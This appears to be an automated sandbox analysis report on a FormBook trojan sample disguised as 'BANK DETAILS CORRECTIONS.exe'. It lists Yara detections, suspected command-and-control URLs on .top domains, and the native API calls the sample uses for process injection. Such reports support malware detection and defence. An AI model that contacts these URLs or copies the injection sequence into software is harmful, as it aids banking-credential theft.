Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://xajg3.mmdb8.top/ji0/b0kf5r.xls
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://zbgzs.5pych.top/zic/qxk3gc.doc
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://zmcd3i.7m9y3.top/f3b/iv0u2y.docx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://zqjt96.8kb9n.top/nilm9fi/81afsn7.htm
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://zspo.sf3l2.top/0ie1ye/vlc52d.htm

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040B043 NtCreateSection, 12_2_0040B043
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040A803 NtGetContextThread, 12_2_0040A803
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040B263 NtMapViewOfSection, 12_2_0040B263
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040AA13 NtSetContextThread, 12_2_0040AA13
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040BB33 NtDelayExecution, 12_2_0040BB33
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0042BBF3 NtClose, 12_2_0042BBF3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040AC23 NtResumeThread, 12_2_0040AC23
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040B493 NtCreateFile, 12_2_0040B493
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040A5F3 NtSuspendThread, 12_2_0040A5F3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040B6C3 NtReadFile, 12_2_0040B6C3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040BF53 NtAllocateVirtualMemory, 12_2_0040BF53
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962B60 NtClose,LdrInitializeThunk, 12_2_01962B60
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962DF0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_01962DF0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962C70 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_01962C70
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019635C0 NtCreateMutant,LdrInitializeThunk, 12_2_019635C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01964340 NtSetContextThread, 12_2_01964340
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01964650 NtSuspendThread, 12_2_01964650
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962B80 NtQueryInformationFile, 12_2_01962B80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962BA0 NtEnumerateValueKey, 12_2_01962BA0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962BF0 NtAllocateVirtualMemory, 12_2_01962BF0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962BE0 NtQueryValueKey, 12_2_01962BE0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962AB0 NtWaitForSingleObject, 12_2_01962AB0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962AD0 NtReadFile, 12_2_01962AD0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962AF0 NtWriteFile, 12_2_01962AF0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962DB0 NtEnumerateKey, 12_2_01962DB0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962DD0 NtDelayExecution, 12_2_01962DD0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962D10 NtMapViewOfSection, 12_2_01962D10
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962D00 NtSetInformationFile, 12_2_01962D00
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962D30 NtUnmapViewOfSection, 12_2_01962D30
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962CA0 NtQueryInformationToken, 12_2_01962CA0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962CC0 NtQueryVirtualMemory, 12_2_01962CC0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962CF0 NtOpenProcess, 12_2_01962CF0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962C00 NtQueryInformationProcess, 12_2_01962C00
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962C60 NtCreateKey, 12_2_01962C60
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962F90 NtProtectVirtualMemory, 12_2_01962F90
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962FB0 NtResumeThread, 12_2_01962FB0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962FA0 NtQuerySection, 12_2_01962FA0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962FE0 NtCreateFile, 12_2_01962FE0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962F30 NtCreateSection, 12_2_01962F30
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962F60 NtCreateProcessEx, 12_2_01962F60
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962E80 NtReadVirtualMemory, 12_2_01962E80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962EA0 NtAdjustPrivilegesToken, 12_2_01962EA0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962EE0 NtQueueApcThread, 12_2_01962EE0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01962E30 NtWriteVirtualMemory, 12_2_01962E30
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01963090 NtSetValueKey, 12_2_01963090
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01963010 NtOpenDirectoryObject, 12_2_01963010
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019639B0 NtGetContextThread, 12_2_019639B0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01963D10 NtOpenProcessToken, 12_2_01963D10
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01963D70 NtOpenThread, 12_2_01963D70
Detected potential crypto function
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_0135DCB4 0_2_0135DCB4
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_053B8568 0_2_053B8568
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_053B8154 0_2_053B8154
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_053B855A 0_2_053B855A
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_053B0006 0_2_053B0006
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_053B0040 0_2_053B0040
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_053B1490 0_2_053B1490
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_053BB2C0 0_2_053BB2C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_076D76C8 0_2_076D76C8
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_076D2129 0_2_076D2129
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_076D50E0 0_2_076D50E0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_076D6D0B 0_2_076D6D0B
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_076D6D18 0_2_076D6D18
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_076DDC48 0_2_076DDC48
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_076D4CA8 0_2_076D4CA8
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_076DE900 0_2_076DE900
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_076D68E0 0_2_076D68E0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00402820 12_2_00402820
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040F8C7 12_2_0040F8C7
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_004032E5 12_2_004032E5
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_004032F0 12_2_004032F0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00402B10 12_2_00402B10
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00401BD5 12_2_00401BD5
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00401BE0 12_2_00401BE0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00417C53 12_2_00417C53
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_004114E3 12_2_004114E3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00401DB0 12_2_00401DB0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040F779 12_2_0040F779
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00411703 12_2_00411703
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040F783 12_2_0040F783
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0042DF93 12_2_0042DF93
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00402FA6 12_2_00402FA6
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00402FB0 12_2_00402FB0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019F01AA 12_2_019F01AA
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E81CC 12_2_019E81CC
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CA118 12_2_019CA118
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01920100 12_2_01920100
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B8158 12_2_019B8158
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C2000 12_2_019C2000
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193E3F0 12_2_0193E3F0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019F03E6 12_2_019F03E6
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EA352 12_2_019EA352
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B02C0 12_2_019B02C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019D0274 12_2_019D0274
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019F0591 12_2_019F0591
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01930535 12_2_01930535
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019DE4F6 12_2_019DE4F6
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019D4420 12_2_019D4420
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E2446 12_2_019E2446
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192C7C0 12_2_0192C7C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01954750 12_2_01954750
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01930770 12_2_01930770
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194C6E0 12_2_0194C6E0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019329A0 12_2_019329A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019FA9A6 12_2_019FA9A6
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01946962 12_2_01946962
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019168B8 12_2_019168B8
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195E8F0 12_2_0195E8F0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193A840 12_2_0193A840
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E6BD7 12_2_019E6BD7
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EAB40 12_2_019EAB40
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192EA80 12_2_0192EA80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01948DBF 12_2_01948DBF
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192ADE0 12_2_0192ADE0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CCD1F 12_2_019CCD1F
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193AD00 12_2_0193AD00
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019D0CB5 12_2_019D0CB5
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01920CF2 12_2_01920CF2
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01930C00 12_2_01930C00
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019AEFA0 12_2_019AEFA0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01922FC8 12_2_01922FC8
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193CFE0 12_2_0193CFE0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01950F30 12_2_01950F30
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019D2F30 12_2_019D2F30
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01972F28 12_2_01972F28
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A4F40 12_2_019A4F40
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01942E90 12_2_01942E90
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019ECE93 12_2_019ECE93
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EEEDB 12_2_019EEEDB
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EEE26 12_2_019EEE26
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01930E59 12_2_01930E59
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193B1B0 12_2_0193B1B0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191F172 12_2_0191F172
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019FB16B 12_2_019FB16B
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0196516C 12_2_0196516C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019DF0CC 12_2_019DF0CC
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019370C0 12_2_019370C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E70E9 12_2_019E70E9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EF0E0 12_2_019EF0E0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0197739A 12_2_0197739A
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E132D 12_2_019E132D
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191D34C 12_2_0191D34C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019352A0 12_2_019352A0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194B2C0 12_2_0194B2C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019D12ED 12_2_019D12ED
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CD5B0 12_2_019CD5B0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E7571 12_2_019E7571
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EF43F 12_2_019EF43F
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01921460 12_2_01921460
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EF7B0 12_2_019EF7B0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019217EC 12_2_019217EC
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E16CC 12_2_019E16CC
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C5910 12_2_019C5910
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01939950 12_2_01939950
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194B950 12_2_0194B950
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019338E0 12_2_019338E0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199D800 12_2_0199D800
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194FB80 12_2_0194FB80
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A5BF0 12_2_019A5BF0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0196DBF9 12_2_0196DBF9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EFB76 12_2_019EFB76
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CDAAC 12_2_019CDAAC
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01975AA0 12_2_01975AA0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019D1AA3 12_2_019D1AA3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019DDAC6 12_2_019DDAC6
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EFA49 12_2_019EFA49
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E7A46 12_2_019E7A46
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A3A6C 12_2_019A3A6C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194FDC0 12_2_0194FDC0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E1D5A 12_2_019E1D5A
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01933D40 12_2_01933D40
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E7D73 12_2_019E7D73
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EFCF2 12_2_019EFCF2
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A9C32 12_2_019A9C32
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01931F92 12_2_01931F92
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EFFB1 12_2_019EFFB1
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EFF09 12_2_019EFF09
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01939EB0 12_2_01939EB0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04BCDCB4 13_2_04BCDCB4
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04CD8568 13_2_04CD8568
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04CD8154 13_2_04CD8154
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04CD8559 13_2_04CD8559
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04CD0040 13_2_04CD0040
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04CD0006 13_2_04CD0006
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04CDB2C0 13_2_04CDB2C0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04D2C6E0 13_2_04D2C6E0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04D2C6D0 13_2_04D2C6D0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_052FDC48 13_2_052FDC48
